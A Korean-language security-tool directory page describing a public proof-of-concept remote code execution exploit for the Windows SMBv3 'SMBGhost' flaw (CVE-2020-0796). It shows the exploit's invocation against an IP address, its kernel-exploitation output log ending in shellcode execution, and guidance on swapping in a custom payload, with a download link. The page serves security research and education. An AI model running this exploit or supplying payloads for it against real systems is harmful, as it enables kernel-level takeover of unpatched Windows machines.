Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
SMBGhost_RCE_PoC — CVE-2020-0796 (SMBGhost)에 대한 개념 증명 원격 코드 실행 익스플로잇으로, Windows SMBv3 압축 취약점을 대상으로 하며 커널 셸코드 주입을 포함합니다. | Kitploit
도구/GitHubGitHub/chompie1337/smbghost_rce_poc
Vulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHubchompie1337/smbghost_rce_poc

SMBGhost_RCE_PoC

CVE-2020-0796 (SMBGhost)에 대한 개념 증명 원격 코드 실행 익스플로잇으로, Windows SMBv3 압축 취약점을 대상으로 하며 커널 셸코드 주입을 포함합니다.

저장소 보기
1.4k3376년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

SMBGhost_RCE_PoC

CVE-2020-0796 "SMBGhost"에 대한 RCE PoC

데모 목적으로만 제공됩니다! 참고용으로만 사용하세요. 정말입니다. 이 코드는 제 랩 환경 외부에서는 테스트되지 않았습니다. 빠르게 작성되었으며 더 안정적으로 만들기 위해 약간의 작업이 필요합니다. 가끔 BSOD가 발생합니다. 자기 교육 외의 목적으로 사용하는 것은 극도로 나쁜 생각입니다. 컴퓨터가 불타오를 것입니다. 강아지들이 죽을 것입니다.

이제 그 이야기는 접어두고....

사용 예:

root@kitploit:~
$SMBGhost_RCE_PoC python exploit.py -ip 192.168.142.131
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff79480000000
[+] ntoskrnl entry at fffff80645792010
[+] found PML4 self-ref entry 1eb
[+] found HalpInterruptController at fffff79480001478
[+] found HalpApicRequestInterrupt at fffff80645cb3bb0
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at fffff5fbc0000000
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff78000000a00!
[+] Press a key to execute shellcode!
[+] overwrote HalpInterruptController pointer, should have execution shortly...

exploit.py의 USER_PAYLOAD를 교체하세요. 최대 600바이트입니다. 더 많은 공간이 필요하면 커널 셸 코드를 직접 수정하세요.

lznt1 코드는 여기에서 가져왔습니다. SRVNET 버퍼 헤더를 손상시키되 충돌을 일으키지 않는 "bad compression" 함수를 추가하기 위해 수정되었습니다.

사용한 방법에 대한 자세한 내용은 Ricera Security의 훌륭한 분석 글을 참조하세요: https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html

도구 다운로드